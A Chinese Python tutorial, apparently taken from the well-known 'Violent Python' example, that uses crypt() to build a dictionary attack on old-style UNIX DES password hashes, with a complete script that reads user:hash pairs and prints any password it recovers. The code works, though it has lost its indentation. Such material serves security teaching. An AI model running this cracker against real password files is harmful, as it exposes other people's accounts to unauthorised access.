Python编程–UNIX口令破解机
Python语言的真正优势在于其拥有大量的标准库和第三方库。编写UNIX口令破解机时,需要使用UNIX计算口令hash的crypt()算法。启动Python解释器,看到Python标准库中自己带有crypt库,要计算一个加密的UNIX口令hash,只需要调用函数crypt.crypt(),并将口令喝salt作为参数传递给它。该函数会以字符串形式返回口令的hash。
让我们尝试使用crypt()函数快速计算口令的hash。将库导入之后,将口令“egg”与salt“HX”传递给函数。该函数返回口令的hash–字符串为“HX9LLTdc/jiDE”。成功!
import crypt
crypt.crypt('egg', 'HX')
'HX9LLTdc/jiDE'
现在编写一个程序遍历整个字典,将每一个单词加上指定的salt的计算结果都与加密的口令hash做比较。编写程序的时候,首先创建两个函数:main和testpass。根据各自特定的作用,将程序分隔成相互独立的函数。main函数打开加密口令文件“password.txt”,并逐行读取口令文件中的内容。每一行中的用户和口令hash都是分隔开的。对每个口令hash,main函数都调用testPass()函数,尝试用字典中的单词破解它。
testPass()函数参数时加密口令hash,该hash的前两个字符视为salt,并提取出来,然后打开字典并便利字典中的每个单词,用每个单词和salt计算一个新的加密口令hash。如果计算结果与我们加密口令hash匹配,函数会打印一条消息显示找到密码,并返回。否则,它会在词库中继续对每个单词进行测试。源码如下:
import crypt
def testPass(cryptPass):
salt = cryptPass[0:2]
dictFile = open('./dictionary.txt', 'r')
for word in dictFile.readlines():
word = word.strip('\n')
cryptWord = crypt.crypt(word, salt)
if cryptWord == cryptPass:
print("[+] Found Password: " + word +"\n")
return
print("[-] Password Not Found.\n")
return
def main():
passFile = open('./passwords.txt')
for line in passFile.readlines():
if ":" in line:
user = line.split(':')[0]
cryptPass = line.split(':')[1].strip(' ')
print("[*] Cracking Password For: " + user)
testPass(cryptPass)
if __name__ == '__main__':
main()
运行这个程序之后,可以看到成功破解了用户victim的口令,如下图所示:
